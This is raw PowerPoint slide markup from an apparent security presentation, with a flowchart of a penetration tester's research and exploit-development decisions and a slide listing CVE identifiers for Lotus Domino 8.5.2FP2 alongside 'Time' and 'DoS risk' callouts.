            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>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13</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Прямоугольник 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="3932213"/>
            <a:ext cx="2520280" cy="504899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="4127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3" name="Группа 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3131840" y="3932213"/>
            <a:ext cx="3528392" cy="1080963"/>
            <a:chOff x="2987824" y="3068116"/>
            <a:chExt cx="3528392" cy="1080963"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Прямая со стрелкой 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2987824" y="3320566"/>
              <a:ext cx="576064" cy="843"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FA9816"/>
              </a:solidFill>
              <a:tailEnd type="arrow"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Группа 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3635896" y="3068116"/>
              <a:ext cx="2880320" cy="1080963"/>
              <a:chOff x="3635896" y="3068116"/>
              <a:chExt cx="2880320" cy="1080963"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="TextBox 10"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3707904" y="3153741"/>
                <a:ext cx="2779864" cy="923330"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>Analysis: time for research </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>and exploit dev., resources, </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" dirty="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" dirty="0"/>
                  <a:t>risks, necessity  </a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Прямоугольник 11"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3635896" y="3068116"/>
                <a:ext cx="2880320" cy="1080963"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="4127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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Группа 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6651150" y="3356992"/>
            <a:ext cx="1881290" cy="864096"/>
            <a:chOff x="6588224" y="2780928"/>
            <a:chExt cx="1665266" cy="864096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="Группа 31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6706698" y="2780928"/>
              <a:ext cx="1546792" cy="648072"/>
              <a:chOff x="6706698" y="2780928"/>
              <a:chExt cx="1546792" cy="648072"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="Прямоугольник 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6706698" y="2780928"/>
                <a:ext cx="1465702" cy="648072"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="4127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6732240" y="2780928"/>
                <a:ext cx="1521250" cy="646331"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>We can’t do </a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                  <a:t>that right now</a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="Прямая со стрелкой 19"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6588224" y="3535695"/>
              <a:ext cx="537639" cy="109329"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FA9816"/>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Группа 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6654291" y="4474434"/>
            <a:ext cx="1950157" cy="754766"/>
            <a:chOff x="6588224" y="3754354"/>
            <a:chExt cx="1681726" cy="754766"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Прямоугольник 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6948264" y="4004221"/>
              <a:ext cx="1321686" cy="504899"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="4127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6922933" y="4072004"/>
              <a:ext cx="1033232" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>Research</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="Прямая со стрелкой 23"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6588224" y="3754354"/>
              <a:ext cx="537639" cy="178702"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FA9816"/>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Группа 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4714883" y="5156349"/>
            <a:ext cx="2233381" cy="504899"/>
            <a:chOff x="4644008" y="4395619"/>
            <a:chExt cx="2233381" cy="504899"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Прямоугольник 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644008" y="4395619"/>
              <a:ext cx="1321686" cy="504899"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="4127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p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4677531" y="4463402"/>
              <a:ext cx="1254639" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>Exploit dev.</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="26" name="Прямая со стрелкой 25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6084168" y="4445995"/>
              <a:ext cx="793221" cy="202073"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FA9816"/>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Группа 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="565362" y="4437113"/>
            <a:ext cx="4150654" cy="971686"/>
            <a:chOff x="395536" y="3573016"/>
            <a:chExt cx="4150654" cy="1000883"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="Прямая со стрелкой 27"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2869618" y="3996991"/>
              <a:ext cx="1676572" cy="576908"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FA9816"/>
              </a:solidFill>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395536" y="3573016"/>
              <a:ext cx="2520280" cy="504899"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="4127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63109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dow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down)">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08" y="116632"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lotus Domino 8.5.2FP2</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Объект 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36512" y="1700808"/>
            <a:ext cx="8715436" cy="5072098"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-091</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0915</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0916</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0917</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0919</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>CVE-2011-0920</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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14</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Скругленный прямоугольник 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6012160" y="2636912"/>
            <a:ext cx="2736304" cy="1296144"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3492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Fast analyses…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6300192" y="2276872"/>
            <a:ext cx="2021707"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Pen-tester’s actions</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Выноска 1 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4211960" y="6036178"/>
            <a:ext cx="1368152" cy="777198"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43077"/>
              <a:gd name="adj2" fmla="val -3161"/>
              <a:gd name="adj3" fmla="val -210193"/>
              <a:gd name="adj4" fmla="val -91899"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Группа 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="765280" y="1556792"/>
            <a:ext cx="4814832" cy="777198"/>
            <a:chOff x="909296" y="1064144"/>
            <a:chExt cx="4814832" cy="777198"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Выноска 1 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355976" y="1064144"/>
              <a:ext cx="1368152" cy="777198"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val 60806"/>
                <a:gd name="adj4" fmla="val -88145"/>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Time…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DoS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> risk</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="Группа 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="909296" y="1348040"/>
              <a:ext cx="2232248" cy="493302"/>
              <a:chOff x="5436096" y="3005336"/>
              <a:chExt cx="1440160" cy="207640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="30" name="Прямая соединительная линия 29"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5436096" y="3005336"/>
                <a:ext cx="1440160" cy="2076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flipH="1" flipV="1">
                <a:off x="5476292" y="3005336"/>
                <a:ext cx="1359768" cy="18002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10" name="Группа 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="775009" y="2288381"/>
            <a:ext cx="4805103" cy="913187"/>
            <a:chOff x="919025" y="1795733"/>
            <a:chExt cx="4805103" cy="913187"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Выноска 1 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355976" y="1931722"/>
              <a:ext cx="1368152" cy="777198"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val 10572"/>
                <a:gd name="adj4" fmla="val -86642"/>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Time</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DoS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> risk</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="Группа 31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="919025" y="1795733"/>
              <a:ext cx="2232248" cy="432048"/>
              <a:chOff x="5436096" y="3005336"/>
              <a:chExt cx="1440160" cy="207640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="33" name="Прямая соединительная линия 32"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5436096" y="3005336"/>
                <a:ext cx="1440160" cy="2076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flipH="1" flipV="1">
                <a:off x="5476292" y="3005336"/>
                <a:ext cx="1359768" cy="18002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20" name="Группа 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="827584" y="2697512"/>
            <a:ext cx="4752528" cy="1368152"/>
            <a:chOff x="971600" y="2204864"/>
            <a:chExt cx="4752528" cy="1368152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Выноска 1 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355976" y="2795818"/>
              <a:ext cx="1368152" cy="777198"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val -42306"/>
                <a:gd name="adj4" fmla="val -88895"/>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Time</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DoS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> risk</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35" name="Группа 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="971600" y="2204864"/>
              <a:ext cx="2232248" cy="432048"/>
              <a:chOff x="5436096" y="3005336"/>
              <a:chExt cx="1440160" cy="207640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="36" name="Прямая соединительная линия 35"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5436096" y="3005336"/>
                <a:ext cx="1440160" cy="2076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flipH="1" flipV="1">
                <a:off x="5476292" y="3005336"/>
                <a:ext cx="1359768" cy="18002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44" name="Группа 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="899592" y="3129560"/>
            <a:ext cx="4680520" cy="1872208"/>
            <a:chOff x="1043608" y="2636912"/>
            <a:chExt cx="4680520" cy="1872208"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Выноска 1 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355976" y="3731922"/>
              <a:ext cx="1368152" cy="777198"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val -108403"/>
                <a:gd name="adj4" fmla="val -88144"/>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Time</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DoS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> risk</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="Группа 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1043608" y="2636912"/>
              <a:ext cx="2232248" cy="432048"/>
              <a:chOff x="5436096" y="3005336"/>
              <a:chExt cx="1440160" cy="207640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="39" name="Прямая соединительная линия 38"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5436096" y="3005336"/>
                <a:ext cx="1440160" cy="2076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flipH="1" flipV="1">
                <a:off x="5476292" y="3005336"/>
                <a:ext cx="1359768" cy="18002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45" name="Группа 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="899592" y="3573016"/>
            <a:ext cx="4680520" cy="2304256"/>
            <a:chOff x="1043608" y="3068960"/>
            <a:chExt cx="4680520" cy="2304256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Выноска 1 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4355976" y="4596018"/>
              <a:ext cx="1368152" cy="777198"/>
            </a:xfrm>
            <a:prstGeom prst="borderCallout1">
              <a:avLst>
                <a:gd name="adj1" fmla="val 43077"/>
                <a:gd name="adj2" fmla="val -3161"/>
                <a:gd name="adj3" fmla="val -158637"/>
                <a:gd name="adj4" fmla="val -89646"/>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Time</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="285750" indent="-285750">
                <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DoS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> risk</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Группа 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1043608" y="3068960"/>
              <a:ext cx="2232248" cy="432048"/>
              <a:chOff x="5436096" y="3005336"/>
              <a:chExt cx="1440160" cy="207640"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="42" name="Прямая соединительная линия 41"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5436096" y="3005336"/>
                <a:ext cx="1440160" cy="2076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a:xfrm flipH="1" flipV="1">
                <a:off x="5476292" y="3005336"/>
                <a:ext cx="1359768" cy="18002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47" name="Скругленный прямоугольник 46"/>
